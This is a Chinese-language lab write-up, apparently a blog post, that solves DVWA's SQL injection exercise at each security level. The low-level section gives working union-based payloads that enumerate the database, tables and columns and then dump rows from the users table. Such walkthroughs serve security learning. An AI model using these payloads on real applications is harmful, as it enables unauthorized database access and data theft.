DVWA SQL注入全级别

low

常规操作先试试,比如and 1 = 2之类的,或者单引号、双引号等等,用and试了之后发现没出现什么问题,盲猜参数id是被引号括起来了,试了试确实如此,如果还是不行的话就可以试试双引号。还有一点要说的是这里的问题不光是联合查询注入,也是报错注入。这里就用最简单的联合查询注入做吧。

输入1’ and 1=2 -- - 正常,那么接着就可以用order by查询一下字段数,到order by 3时发现出现错误,而order by 2没有错误,所以当前表有两个字段。那就开始吧!

输入 1' and 1 = 2 union select 1,database()爆库名

输入 1' and 1 = 2 union select 1,group_concat(table_name) from Information_schema.tables where table_schema = database() -- - 爆表名

输入 1' and 1 = 2 union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users' -- - 爆字段名

输入1' and 1 = 2 union select user_id,first_name from users limit 0,1 -- - 爆数据

至此完成!

medium

这里用了下拉列表模式,且为post型传参,以防止注入,可以用hackbar试一下,或者用burpsuit抓包做。我就用hackbar吧

尝试修改id=2 发现正常跳转了,然后再进行尝试发现也没有引号,所以下面就和low一样直接爆数据就行了

high

这直接爆出来了,跟low一样,就是多了个弹窗而已,也不知道有什么用。。。可能是为了防止用sqlmap吧,但是因大失小,没能防止手动注入,连抓包或者hackbar都用不到

impossible

PDO预处理,无解。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • DVWA 环境搭建和安装简易使用 下载安装phpstudy,这部分不用说了,肯定大家都有,或者安装过。在浏览器输入...
    Mr_超Sir阅读 4,181评论 0 0
  • 注入攻击原理: 注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程...
    Admin3K阅读 5,157评论 0 6
  • 🎈注入攻击的原理: 注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者...
    小银同学阿阅读 5,618评论 0 0
  • 分类 SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。 可显注入 攻击...
    废品人生阅读 3,240评论 0 0
  • 1、设置把安全等级先调整为low,让自己获得点信心,免得一来就被打脸。DVWA之SQL注入演练(low) 2、测试...
    SuperRoot阅读 5,922评论 0 4